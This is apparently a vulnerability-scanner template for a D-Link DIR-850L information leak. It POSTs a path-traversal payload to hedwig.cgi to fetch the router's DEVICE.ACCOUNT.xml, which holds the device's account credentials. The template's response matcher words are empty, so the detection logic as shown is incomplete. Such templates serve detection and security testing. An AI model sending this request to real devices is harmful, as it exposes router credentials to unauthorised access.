id: dlink-850L-info-leak info: name: Dlink Dir-850L Info Leak author: pikpikcu severity: info reference: - https://xz.aliyun.com/t/2941 tags: dlink requests: - method: POST path: - "{{BaseURL}}/hedwig.cgi" body: | ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml headers: Cookie: uid=R8tBjwtFc8 Content-Type: text/xml matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "" - "" part: body